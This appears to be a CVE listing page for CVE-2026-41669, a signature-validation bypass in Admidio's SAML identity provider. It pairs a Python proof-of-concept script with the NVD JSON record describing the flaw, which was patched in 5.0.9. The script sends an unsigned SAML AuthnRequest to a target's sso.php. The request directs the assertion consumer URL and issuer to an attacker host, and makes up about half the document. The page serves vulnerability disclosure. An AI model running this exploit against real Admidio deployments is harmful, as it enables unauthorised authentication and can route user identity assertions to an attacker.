CVE-2026-41669

import requests # Target URL (Example) target_url = "https://target-admidio.com/adm_program/modules/saml/sso.php" # A sample unsigned SAML AuthnRequest # In a real attack, this would be crafted to match the IdP requirements saml_request = "" saml_request += "<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" " saml_request += "ID=\"_1234567890\" Version=\"2.0\" ProtocolBinding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST\" " saml_request += "AssertionConsumerServiceURL=\"https://attacker.com/consume\" " saml_request += "IssueInstant=\"2026-05-07T12:00:00Z\">" saml_request += "<saml:Issuer xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\">https://attacker.com</saml:Issuer>" saml_request += "</samlp:AuthnRequest>" # Base64 encode the SAML request (usually required) import base64 encoded_saml = base64.b64encode(saml_request.encode()).decode() # Payload to send payload = { "SAMLRequest": encoded_saml # Note: No Signature parameter is sent } print("[+] Sending unsigned SAML Request to target...") try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request processed successfully. Signature check bypassed.") else: print("[-] Request failed or rejected.") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-41669", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:30.400", "lastModified": "2026-05-07T15:16:08.460", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio SAML Identity Provider implementation discards the return value of its validateSignature() method at both call sites (handleSSORequest() line 418 and handleSLORequest() line 613). The method returns error strings on failure rather than throwing exceptions, but the developer believed it would throw (per comments on lines 416 and 611). This means the smc_require_auth_signed configuration option is completely ineffective — unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests are processed identically to properly signed ones. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}